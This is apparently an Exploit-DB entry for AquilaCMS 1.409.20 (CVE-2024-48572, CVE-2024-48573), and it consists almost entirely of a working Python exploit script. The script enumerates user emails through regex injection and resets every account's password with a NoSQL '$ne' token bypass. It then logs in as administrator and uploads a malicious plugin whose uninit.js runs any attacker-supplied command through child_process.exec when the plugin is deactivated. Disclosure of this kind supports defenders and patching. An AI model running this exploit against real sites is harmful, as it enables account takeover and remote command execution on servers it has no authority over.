AquilaCMS 1.409.20 - Remote Command Execution (RCE)

EDB-ID:

52164




Platform:

PHP

Date:

2025-04-10


# Exploit Title: AquilaCMS 1.409.20 - Remote Command Execution (RCE)
# Date: 2024-10-25
# Exploit Author: Eui Chul Chung
# Vendor Homepage: https://www.aquila-cms.com/
# Software Link: https://github.com/AquilaCMS/AquilaCMS
# Version: v1.409.20
# CVE: CVE-2024-48572, CVE-2024-48573


import io
import json
import uuid
import string
import zipfile
import argparse
import requests
import textwrap


def unescape_special_characters(email):
    return (
        email.replace("[$]", "$")
        .replace("[*]", "*")
        .replace("[+]", "+")
        .replace("[-]", "-")
        .replace("[.]", ".")
        .replace("[?]", "?")
        .replace(r"[\^]", "^")
        .replace("[|]", "|")
    )


def get_user_emails():
    valid_characters = list(
        string.ascii_lowercase + string.digits + "!#%&'/=@_`{}~"
    ) + ["[$]", "[*]", "[+]", "[-]", "[.]", "[?]", r"[\^]", "[|]"]

    emails_found = []

    next_emails = ["^"]
    while next_emails:
        prev_emails = next_emails
        next_emails = []

        for email in prev_emails:
            found = False
            for ch in valid_characters:
                data = {"email": f"{email + ch}.*"}
                res = requests.put(f"{args.url}/api/v2/user", json=data)

                if json.loads(res.text)["code"] == "UserAlreadyExist":
                    next_emails.append(email + ch)
                    found = True

            if not found:
                emails_found.append(email[1:])
                print(f"[+] {unescape_special_characters(email[1:])}")

    return emails_found


def reset_password(email):
    data = {"email": email}
    requests.post(f"{args.url}/api/v2/user/resetpassword", json=data)

    data = {"token": {"$ne": None}, "password": args.password}
    requests.post(f"{args.url}/api/v2/user/resetpassword", json=data)

    print(f"[+] {unescape_special_characters(email)} : {args.password}")


def get_admin_auth_token(emails):
    for email in emails:
        data = {"username": email, "password": args.password}
        res = requests.post(f"{args.url}/api/v2/auth/login/admin", json=data)

        if res.status_code == 200:
            print(f"[+] Administrator account : {unescape_special_characters(email)}")
            return json.loads(res.text)["data"]

    return None


def create_plugin(plugin_name):
    payload = textwrap.dedent(
        f"""
    const {{ exec }} = require("child_process");

    /**
     * This function is called when the plugin is desactivated or when we delete it
     */
    module.exports = async function (resolve, reject) {{
      try {{
        exec("{args.command}");
        return resolve();
      }} catch (error) {{}}
    }};
    """
    ).strip()

    plugin = io.BytesIO()
    with zipfile.ZipFile(plugin, "a", zipfile.ZIP_DEFLATED, False) as zip_file:
        zip_file.writestr(
            f"{plugin_name}/package.json",
            io.BytesIO(f'{{ "name": "{plugin_name}" }}'.encode()).getvalue(),
        )
        zip_file.writestr(
            f"{plugin_name}/info.json", io.BytesIO(b'{ "info": {} }').getvalue()
        )
        zip_file.writestr(
            f"{plugin_name}/uninit.js", io.BytesIO(payload.encode()).getvalue()
        )

    plugin.seek(0)
    return plugin


def rce(emails):
    auth_token = get_admin_auth_token(emails)
    if auth_token is None:
        print("[-] Administrator account not found")
        return

    print("[+] Create malicious plugin")
    plugin_name = uuid.uuid4().hex
    plugin = create_plugin(plugin_name)

    print("[+] Upload plugin")
    headers = {"Authorization": auth_token}
    files = {"file": (f"{plugin_name}.zip", plugin, "application/zip")}
    requests.post(f"{args.url}/api/v2/modules/upload", headers=headers, files=files)

    print("[+] Find uploaded plugin")
    headers = {"Authorization": auth_token}
    data = {"PostBody": {"limit": 0}}
    res = requests.post(f"{args.url}/api/v2/modules", headers=headers, json=data)

    plugin_id = None
    for data in json.loads(res.text)["datas"]:
        if data["name"] == plugin_name:
            plugin_id = data["_id"]
            print(f"[+] Plugin ID : {plugin_id}")
            break

    if plugin_id is None:
        print("[-] Plugin not found")
        return

    print("[+] Deactivate plugin")
    headers = {"Authorization": auth_token}
    data = {"idModule": plugin_id, "active": False}
    res = requests.post(f"{args.url}/api/v2/modules/toggle", headers=headers, json=data)

    if res.status_code == 200:
        print("[+] Command execution succeeded")
    else:
        print("[-] Command execution failed")


def main():
    print("[*] Retrieve email addresses")
    emails = get_user_emails()

    print("\n[*] Reset password")
    for email in emails:
        reset_password(email)

    print("\n[*] Perform remote code execution")
    rce(emails)


if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument(
        "-u",
        dest="url",
        help="Site URL (e.g. www.aquila-cms.com)",
        type=str,
        required=True,
    )
    parser.add_argument(
        "-p",
        dest="password",
        help="Password to use for password reset (e.g. HaXX0r3d!)",
        type=str,
        default="HaXX0r3d!",
    )
    parser.add_argument(
        "-c",
        dest="command",
        help="Command to execute (e.g. touch /tmp/pwned)",
        type=str,
        default="touch /tmp/pwned",
    )
    args = parser.parse_args()

    main()